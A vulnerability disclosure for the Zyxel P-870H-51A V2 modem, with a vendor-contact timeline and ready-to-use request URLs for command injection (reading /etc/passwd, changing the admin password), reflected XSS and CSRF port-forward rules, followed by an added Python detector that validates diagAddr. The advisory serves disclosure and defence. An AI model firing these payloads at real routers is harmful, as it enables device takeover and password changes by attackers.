This is a vulnerability report for the Zyxel P-870H-51A V2 ADSL2 modem (multiple vulnerabilities).
Technical specifications
- Product: Zyxel P-870H-51A V2
- Firmware: 1.01(AWZ.4)
- Vulnerability type: cross-site request forgery, cross-site scripting, command injection
Disclosure timeline
- 6th May 2014 - Contacted vendor (never received reply)
- 28th May 2014 - Contacted NCSC-FI
- 11th August 2014 - Received reply from NCSC-FI. They had contacted the vendor. The vendor had replied that the product is no longer supported and asked to make sure that the firmware was updated.
- 12th January 2015 - Public disclosure
Remote Command Execution
Requires that the user is logged in. The command output is shown in the response. Can also be exploited remotely as a CSRF vulnerability (however, in that case the attacker does not receive the output).
http://192.168.1.1/DiagGeneral.cgi?diagAddr=google.fi;%20cat%20/etc/passwd&diagTestType=1
Since the default shell of the Linux distribution is very limited, it may be handy to run commands via sh:
http://192.168.1.1/DiagGeneral.cgi?diagAddr=google.fi;%20sh%20-c%20ifconfig%20-a&diagTestType=1
Cross-site scripting
http://192.168.1.1/DiagGeneral.cgi?diagAddr=google.fi';alert('xss');//&diagTestType=1
Cross-site request forgery
Many actions can be forged, such as adding port forwarding rules to the internal network. Just redirect the victim to the following URL:
http://192.168.1.1/portForwarding.cmd?action=add&enableNAT=TRUE&srvName=asdf&dstWanIf=ptm0_1&srvAddr=192.168.1.123&wanIp=&proto=1,&eStart=1234,&eEnd=1234,&iStart=1234,&iEnd=1234,
Requests that trigger “change password” and “reboot” require a sessionKey parameter and thus cannot be forged. Wait, let’s look again. The device contains a non-standard Unix passwd command, which does not require the “current” password:
> passwd
Usage: passwd <supervisor|admin|user> <password>
passwd --help
>
Hence, by combining the CSRF vulnerability with the RCE, the attacker can remotely change the admin password:
http://192.168.1.1/DiagGeneral.cgi?diagAddr=google.fi;%20passwd%20admin%20newpasswd
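As an added defensive example (not part of the original report), the following Python applies the allowlist check that DiagGeneral.cgi should have enforced on diagAddr before building a shell command, and runs that check plus a portForwarding.cmd CSRF check over a constructed log made of the request URLs above; the function names, finding labels and sample log are my assumptions.

```python
from __future__ import annotations
import re
from urllib.parse import unquote, urlsplit

# diagAddr must be a bare hostname or dotted IPv4 address (RFC 1123 labels).
_HOST_RE = re.compile(
    r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*"
)

def is_valid_diag_addr(value: str) -> bool:
    """Allowlist check the CGI should apply before diagAddr ever reaches a shell."""
    return len(value) <= 253 and _HOST_RE.fullmatch(value) is not None

def query_params(query: str) -> dict[str, list[str]]:
    """Split on '&' only; parsers that also split on ';' would hide the payload."""
    params: dict[str, list[str]] = {}
    for pair in query.split("&"):
        if pair:
            key, _, val = pair.partition("=")
            params.setdefault(unquote(key), []).append(unquote(val))
    return params

def classify_request(url: str) -> list[str]:
    """Return finding labels for one request URL taken from a proxy or device log."""
    parts = urlsplit(url)
    params = query_params(parts.query)
    findings: list[str] = []
    if parts.path.endswith("/DiagGeneral.cgi"):
        # Anything that is not a plain host/IP in diagAddr is an injection attempt
        # (the same sink carries both the command-injection and the XSS payloads).
        if any(not is_valid_diag_addr(v) for v in params.get("diagAddr", [])):
            findings.append("diagAddr-injection")
    if parts.path.endswith("/portForwarding.cmd") and params.get("action") == ["add"]:
        # No sessionKey protects this endpoint, so every add is a CSRF candidate.
        findings.append("port-forward-add")
    return findings

# Constructed sample log: the advisory's URLs plus one legitimate diagnostic request.
SAMPLE_LOG = [
    "http://192.168.1.1/DiagGeneral.cgi?diagAddr=google.fi&diagTestType=1",
    "http://192.168.1.1/DiagGeneral.cgi?diagAddr=google.fi;%20cat%20/etc/passwd&diagTestType=1",
    "http://192.168.1.1/DiagGeneral.cgi?diagAddr=google.fi';alert('xss');//&diagTestType=1",
    "http://192.168.1.1/portForwarding.cmd?action=add&enableNAT=TRUE&srvName=asdf&dstWanIf=ptm0_1&srvAddr=192.168.1.123&wanIp=&proto=1,&eStart=1234,&eEnd=1234,&iStart=1234,&iEnd=1234,",
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(classify_request(line) or ["ok"], line)
```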